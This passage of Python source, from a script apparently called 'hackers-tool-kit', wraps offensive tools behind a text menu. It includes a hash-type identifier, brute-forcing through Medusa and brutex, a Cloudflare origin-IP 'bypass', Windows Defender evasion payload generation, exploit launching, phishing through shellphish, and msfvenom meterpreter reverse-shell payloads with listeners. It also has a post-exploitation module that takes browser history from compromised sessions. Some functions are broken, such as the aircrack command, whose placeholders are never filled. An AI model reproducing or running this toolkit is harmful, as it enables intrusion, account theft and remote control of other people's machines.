hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - found = True -mainbanner() -main() 